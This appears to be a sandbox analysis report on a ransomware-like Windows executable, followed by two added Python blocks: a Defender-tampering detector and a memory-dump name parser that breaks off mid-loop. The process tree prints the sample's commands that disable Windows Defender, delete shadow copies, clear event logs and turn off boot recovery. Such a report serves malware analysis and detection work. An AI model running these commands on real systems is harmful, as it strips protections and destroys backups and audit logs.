Resubmissions

31-01-2022 12:20

220131-ph549ahga6 10

31-01-2022 12:00

220131-n6sndshahl 10

Analysis

  • max time kernel
    186s
  • max time network
    186s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    31-01-2022 12:20

Errors

Reason
Task went missing from backend

General

  • Target

    06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe

  • Size

    4.2MB

  • MD5

    4685e7981959356439fe0f5643d45450

  • SHA1

    88b7ef25b17528a464758aafa9e853477e391491

  • SHA256

    06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8

  • SHA512

    8aefb153e913544d1e83b98cc964f266e537bd962c44dc2142f33a4ddf356230bc2b10d713fa84c77a33a2a8003cf1ab143f44dee227d7832f5cbd516f94b56f

Malware Config

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses the MpCmdRun utility to delete all AV definitions.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies security service 2 TTPs 1 IoCs
  • Clears Windows event logs 1 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 6 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utility to control services on the system.

  • Checks SCSI registry key(s) 3 TTPs 7 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 3 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe
    "C:\Users\Admin\AppData\Local\Temp\06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe"
    1⤵
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3780
    • C:\Windows\SYSTEM32\net.exe
      net.exe stop "SamSs" /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2256
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop "SamSs" /y
        3⤵
        PID:3488
    • C:\Windows\SYSTEM32\net.exe
      net.exe stop "SDRSVC" /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:912
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop "SDRSVC" /y
        3⤵
        PID:3140
    • C:\Windows\SYSTEM32\net.exe
      net.exe stop "SstpSvc" /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3860
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop "SstpSvc" /y
        3⤵
        PID:3444
    • C:\Windows\SYSTEM32\net.exe
      net.exe stop "UI0Detect" /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3532
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop "UI0Detect" /y
        3⤵
        PID:2848
    • C:\Windows\SYSTEM32\net.exe
      net.exe stop "vmicvss" /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1456
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop "vmicvss" /y
        3⤵
        PID:1420
    • C:\Windows\SYSTEM32\net.exe
      net.exe stop "VSS" /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2900
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop "VSS" /y
        3⤵
        PID:2116
    • C:\Windows\SYSTEM32\net.exe
      net.exe stop "wbengine" /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:704
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop "wbengine" /y
        3⤵
        PID:3232
    • C:\Windows\SYSTEM32\net.exe
      net.exe stop "WebClient" /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1348
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop "WebClient" /y
        3⤵
        PID:1196
    • C:\Windows\SYSTEM32\net.exe
      net.exe stop "UnistoreSvc_1350b" /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1428
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop "UnistoreSvc_1350b" /y
        3⤵
        PID:1856
    • C:\Windows\SYSTEM32\sc.exe
      sc.exe config "SamSs" start= disabled
      2⤵
      PID:2244
    • C:\Windows\SYSTEM32\sc.exe
      sc.exe config "SDRSVC" start= disabled
      2⤵
      PID:1384
    • C:\Windows\SYSTEM32\sc.exe
      sc.exe config "SstpSvc" start= disabled
      2⤵
      PID:1532
    • C:\Windows\SYSTEM32\sc.exe
      sc.exe config "UI0Detect" start= disabled
      2⤵
      PID:1836
    • C:\Windows\SYSTEM32\sc.exe
      sc.exe config "vmicvss" start= disabled
      2⤵
      PID:3588
    • C:\Windows\SYSTEM32\sc.exe
      sc.exe config "VSS" start= disabled
      2⤵
      PID:2024
    • C:\Windows\SYSTEM32\sc.exe
      sc.exe config "wbengine" start= disabled
      2⤵
      PID:3040
    • C:\Windows\SYSTEM32\sc.exe
      sc.exe config "WebClient" start= disabled
      2⤵
      PID:2484
    • C:\Windows\SYSTEM32\sc.exe
      sc.exe config "UnistoreSvc_1350b" start= disabled
      2⤵
      PID:3320
    • C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      PID:3808
    • C:\Windows\SYSTEM32\reg.exe
      reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      2⤵
      PID:2808
    • C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      2⤵
      PID:1048
    • C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      2⤵
      PID:1676
    • C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
      2⤵
      PID:956
    • C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      2⤵
      PID:3512
    • C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      2⤵
      PID:2176
    • C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      2⤵
      PID:1296
    • C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      2⤵
      PID:3828
    • C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      2⤵
      PID:2868
    • C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      2⤵
      PID:2092
    • C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
      2⤵
      PID:1204
    • C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      2⤵
      PID:3364
    • C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
      2⤵
      PID:876
    • C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
      2⤵
      PID:3264
    • C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
      2⤵
      PID:1556
    • C:\Windows\SYSTEM32\schtasks.exe
      schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
      2⤵
      PID:1096
    • C:\Windows\SYSTEM32\schtasks.exe
      schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      2⤵
      PID:1056
    • C:\Windows\SYSTEM32\schtasks.exe
      schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      2⤵
      PID:1268
    • C:\Windows\SYSTEM32\schtasks.exe
      schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      2⤵
      PID:1100
    • C:\Windows\SYSTEM32\schtasks.exe
      schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      2⤵
      PID:1856
    • C:\Windows\SYSTEM32\reg.exe
      reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
      2⤵
      PID:1604
    • C:\Windows\SYSTEM32\reg.exe
      reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
      2⤵
      PID:1608
    • C:\Windows\SYSTEM32\reg.exe
      reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
      2⤵
      PID:2020
    • C:\Windows\SYSTEM32\reg.exe
      reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
      2⤵
      • Modifies registry class
      PID:2084
    • C:\Windows\SYSTEM32\reg.exe
      reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
      2⤵
      • Modifies registry class
      PID:3228
    • C:\Windows\SYSTEM32\reg.exe
      reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
      2⤵
      • Modifies registry class
      PID:3028
    • C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      PID:4052
    • C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      PID:1448
    • C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      PID:8
    • C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      PID:3608
    • C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      • Modifies security service
      PID:2204
    • C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      PID:3932
    • C:\Windows\SYSTEM32\vssadmin.exe
      vssadmin.exe delete shadows /all /quiet
      2⤵
      • Interacts with shadow copies
      PID:2008
    • C:\Windows\SYSTEM32\wevtutil.exe
      wevtutil.exe cl system
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3816
    • C:\Windows\SYSTEM32\wevtutil.exe
      wevtutil.exe cl security
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:648
    • C:\Windows\SYSTEM32\wevtutil.exe
      wevtutil.exe cl application
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2848
    • C:\Windows\System32\Wbem\wmic.exe
      wmic.exe SHADOWCOPY /nointeractive
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1460
    • C:\Windows\System32\Wbem\wmic.exe
      wmic.exe shadowcopy delete
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2712
    • C:\Windows\SYSTEM32\bcdedit.exe
      bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      2⤵
      • Modifies boot configuration data using bcdedit
      PID:1480
    • C:\Windows\SYSTEM32\bcdedit.exe
      bcdedit.exe /set {default} recoveryenabled no
      2⤵
      • Modifies boot configuration data using bcdedit
      PID:1800
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      2⤵
      PID:3212
      • C:\Program Files\Windows Defender\MpCmdRun.exe
        "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
        3⤵
        • Deletes Windows Defender Definitions
        PID:3888
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
      2⤵
      PID:2200
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Set-MpPreference -DisableIOAVProtection $true
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:3560
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
      2⤵
      PID:3268
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Set-MpPreference -DisableRealtimeMonitoring $true
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1696
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Drops file in Windows directory
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:964
  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe"
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:3888
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff96ef34f50,0x7ff96ef34f60,0x7ff96ef34f70
                                                                                                          2⤵
                                                                                                            PID:2316
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1528,17417055853907971428,5810439352338047793,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1540 /prefetch:2
                                                                                                            2⤵
                                                                                                              PID:3440
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1528,17417055853907971428,5810439352338047793,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1752 /prefetch:8
                                                                                                              2⤵
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:2348
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1528,17417055853907971428,5810439352338047793,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2180 /prefetch:8
                                                                                                              2⤵
                                                                                                                PID:3532
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,17417055853907971428,5810439352338047793,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2708 /prefetch:1
                                                                                                                2⤵
                                                                                                                  PID:1384
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,17417055853907971428,5810439352338047793,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2696 /prefetch:1
                                                                                                                  2⤵
                                                                                                                    PID:2244
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,17417055853907971428,5810439352338047793,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:1
                                                                                                                    2⤵
                                                                                                                      PID:1188
                                                                                                                  • C:\Windows\ImmersiveControlPanel\SystemSettings.exe
                                                                                                                    "C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
                                                                                                                    1⤵
                                                                                                                    • Drops file in Windows directory
                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:3992
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    "C:\Windows\system32\cmd.exe"
                                                                                                                    1⤵
                                                                                                                      PID:2348
                                                                                                                    • C:\Windows\System32\rundll32.exe
                                                                                                                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                      1⤵
                                                                                                                        PID:928
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        "C:\Windows\system32\cmd.exe"
                                                                                                                        1⤵
                                                                                                                          PID:2956
                                                                                                                        • C:\Windows\system32\LogonUI.exe
                                                                                                                          "LogonUI.exe" /flags:0x0 /state0:0xa3a89055 /state1:0x41c64e6d
                                                                                                                          1⤵
                                                                                                                          • Drops file in Windows directory
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:2964
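The cmd.exe to powershell.exe chain above (PIDs 3268 and 1696) is the sample turning off Defender real-time protection with Set-MpPreference, which is what the "Modifies Windows Defender Real-time Protection settings" signature records. The following detection logic is an added example, not part of this report or of the sample; it scans constructed process-creation events modelled on that chain. The event schema (pid, ppid, image, command_line), the placeholder parent PID 4000 and the extra benign, re-enable and abbreviated command lines are assumptions for illustration. It goes slightly beyond the page's single command: it handles the other Set-MpPreference disable switches, PowerShell parameter-prefix abbreviation, and exclusion additions.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (assumed schema, not a product's)."""
    pid: int
    ppid: int
    image: str
    command_line: str


# Set-MpPreference switches that weaken Defender when set to $true / 1
# (ATT&CK T1562.001, Impair Defenses: Disable or Modify Tools).
DISABLE_SWITCHES = (
    "DisableRealtimeMonitoring",
    "DisableBehaviorMonitoring",
    "DisableIOAVProtection",
    "DisableScriptScanning",
    "DisableBlockAtFirstSeen",
)

CMDLET_RE = re.compile(r"(?i)\bset-mppreference\b")
# "-Disable<...> $true" or "-Disable<...> 1"; the switch name is captured
# loosely because PowerShell accepts any unambiguous prefix of a parameter.
DISABLE_TOKEN_RE = re.compile(r"(?i)-(disable[a-z]*)\s+(?:\$true|1)\b")
EXCLUSION_RE = re.compile(
    r"(?i)\b(?:add|set)-mppreference\b.*?-exclusion(?:path|process|extension)"
)


def expand_switch(token: str) -> Optional[str]:
    """Map a possibly abbreviated -Disable* token to the full switch name."""
    t = token.lower()
    hits = [s for s in DISABLE_SWITCHES if s.lower().startswith(t)]
    return hits[0] if len(hits) == 1 else None  # ambiguous prefix: no match


def tamper_findings(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[dict]:
    """Return one finding per tampering indicator found in a single event."""
    parent = by_pid.get(ev.ppid)
    base = {"pid": ev.pid, "image": ev.image,
            "parent_image": parent.image if parent else None}
    findings: List[dict] = []
    if CMDLET_RE.search(ev.command_line):
        for m in DISABLE_TOKEN_RE.finditer(ev.command_line):
            switch = expand_switch(m.group(1))
            if switch:
                findings.append({**base, "rule": "defender_protection_disabled",
                                 "switch": switch})
    if EXCLUSION_RE.search(ev.command_line):
        findings.append({**base, "rule": "defender_exclusion_added", "switch": None})
    return findings


def scan(events: List[ProcEvent]) -> List[dict]:
    # Keyed on PID only for brevity; a real pipeline must key on the process
    # GUID because PIDs are reused (the tree above shows PID 2348 for both a
    # chrome.exe utility process and a later cmd.exe).
    by_pid = {e.pid: e for e in events}
    out: List[dict] = []
    for ev in events:
        out.extend(tamper_findings(ev, by_pid))
    return out


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed events: the first two mirror PIDs 3268 and 1696 in the tree
# above; PID 4000 stands in for the parent not shown here; the rest are
# synthetic negatives and variants.
SAMPLE_EVENTS = [
    ProcEvent(3268, 4000, r"C:\Windows\system32\cmd.exe",
              r"cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true"),
    ProcEvent(1696, 3268, PS, r"powershell Set-MpPreference -DisableRealtimeMonitoring $true"),
    ProcEvent(5001, 4000, PS, r"powershell Get-MpPreference"),  # benign query
    ProcEvent(5002, 4000, PS, r"powershell Set-MpPreference -DisableRealtimeMonitoring $false"),  # re-enables
    ProcEvent(5003, 4000, PS, r"powershell -nop Set-MpPreference -DisableRealtime 1"),  # abbreviated
    ProcEvent(5004, 4000, PS, r"powershell Add-MpPreference -ExclusionPath C:\Users\Public"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Both the cmd.exe wrapper and the powershell.exe child are flagged, since the tampering string appears in both command lines; the parent image on the second finding is what lets a rule score the cmd-spawned PowerShell higher than an interactive admin session. Corroborate command-line hits with Defender's own operational log (event 5001, real-time protection disabled), which fires regardless of how the setting was changed.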

Network

MITRE ATT&CK Enterprise v6

Downloads

• C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  MD5    8592ba100a78835a6b94d5949e13dfc1
  SHA1   63e901200ab9a57c7dd4c078d7f75dcd3b357020
  SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
  SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5    d4238b7043cfe607fce1f0452336e06a
  SHA1   8add55b7e540ffdb705fc577de15a9d7820e5b5a
  SHA256 2226becc8623691d75ff4f9085951af7402174717b4a58a5cd8ce5bd534c5d97
  SHA512 adaa3f99986f128a91fa7a5b46646e6db0c8f3f2d5f5c2783258a0c16f6c3bf5a833a1802e7f532cf64a6b68ee85cf8ad42808a846d220d4f2a5b6a2dcdc9562

• \??\pipe\crashpad_3888_KSVQANKZMNVTRCGE
  MD5    d41d8cd98f00b204e9800998ecf8427e
  SHA1   da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
  (these are the digests of zero-length input: nothing was read from the named pipe, so the hashes carry no signal and are not usable as indicators)

• memory/1696-171-0x0000024B26C20000-0x0000024B26CEA000-memory.dmp
  Filesize 808KB

• memory/1696-170-0x0000024B26C20000-0x0000024B26CEA000-memory.dmp
  Filesize 808KB

• memory/1696-172-0x0000024B26C20000-0x0000024B26CEA000-memory.dmp
  Filesize 808KB

• memory/3560-120-0x0000022EDEE50000-0x0000022EDEE72000-memory.dmp
  Filesize 136KB

• memory/3560-125-0x0000022EE10E0000-0x0000022EE1156000-memory.dmp
  Filesize 472KB

• memory/3560-127-0x0000022EDEF03000-0x0000022EDEF05000-memory.dmp
  Filesize 8KB

• memory/3560-126-0x0000022EDEF00000-0x0000022EDEF02000-memory.dmp
  Filesize 8KB

• memory/3560-152-0x0000022EDEF06000-0x0000022EDEF08000-memory.dmp
  Filesize 8KB
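The memory-dump names above encode the process, a snapshot sequence number and the virtual address range that was dumped, and the stated Filesize should equal the range length. The following parser is an added example, not part of the report or the sandbox; the naming convention memory/<pid>-<sequence>-<start>-<end>-memory.dmp is inferred from the entries listed above and is an assumption, and the sample list is copied from those entries. It verifies each stated size, rejects ranges that are not page-aligned, and groups the dumps per PID so repeated snapshots of one region (PID 1696's 808KB region, dumped three times) are visible at a glance.

```python
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Assumed naming convention, inferred from the Downloads list above:
#   memory/<pid>-<sequence>-<start>-<end>-memory.dmp
DUMP_RE = re.compile(
    r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$"
)
PAGE = 0x1000  # x64 Windows page size; a dumped region should be page-aligned

# Constructed from the entries above: (artefact name, size as stated).
SAMPLE_DUMPS: List[Tuple[str, str]] = [
    ("memory/1696-171-0x0000024B26C20000-0x0000024B26CEA000-memory.dmp", "808KB"),
    ("memory/1696-170-0x0000024B26C20000-0x0000024B26CEA000-memory.dmp", "808KB"),
    ("memory/1696-172-0x0000024B26C20000-0x0000024B26CEA000-memory.dmp", "808KB"),
    ("memory/3560-120-0x0000022EDEE50000-0x0000022EDEE72000-memory.dmp", "136KB"),
    ("memory/3560-125-0x0000022EE10E0000-0x0000022EE1156000-memory.dmp", "472KB"),
    ("memory/3560-127-0x0000022EDEF03000-0x0000022EDEF05000-memory.dmp", "8KB"),
    ("memory/3560-126-0x0000022EDEF00000-0x0000022EDEF02000-memory.dmp", "8KB"),
    ("memory/3560-152-0x0000022EDEF06000-0x0000022EDEF08000-memory.dmp", "8KB"),
]


def parse_dump(name: str) -> dict:
    """Split a dump name into pid, sequence, start, end and byte size."""
    m = DUMP_RE.match(name)
    if not m:
        raise ValueError(f"not a memory-dump artefact name: {name}")
    pid, seq = int(m.group(1)), int(m.group(2))
    start, end = int(m.group(3), 16), int(m.group(4), 16)
    if end <= start:
        raise ValueError(f"empty or inverted range in {name}")
    if start % PAGE or end % PAGE:
        raise ValueError(f"range not page-aligned in {name}")
    return {"pid": pid, "seq": seq, "start": start, "end": end, "size": end - start}


def size_label(size: int) -> str:
    """Render a byte count the way the report does (whole KB)."""
    return f"{size // 1024}KB"


def check_sizes(entries: List[Tuple[str, str]]) -> List[Tuple[str, bool]]:
    """True where the stated size matches the length of the address range."""
    return [(name, size_label(parse_dump(name)["size"]) == stated)
            for name, stated in entries]


def regions_by_pid(names: List[str]) -> Dict[int, Dict[Tuple[int, int], List[int]]]:
    """pid -> {(start, end): [sequence numbers that dumped that region]}."""
    groups: Dict[int, Dict[Tuple[int, int], List[int]]] = defaultdict(lambda: defaultdict(list))
    for name in names:
        d = parse_dump(name)
        groups[d["pid"]][(d["start"], d["end"])].append(d["seq"])
    return {pid: {rng: sorted(seqs) for rng, seqs in regs.items()}
            for pid, regs in groups.items()}


if __name__ == "__main__":
    for name, ok in check_sizes(SAMPLE_DUMPS):
        print("OK " if ok else "BAD", name)
    for pid, regs in regions_by_pid([n for n, _ in SAMPLE_DUMPS]).items():
        for (start, end), seqs in sorted(regs.items()):
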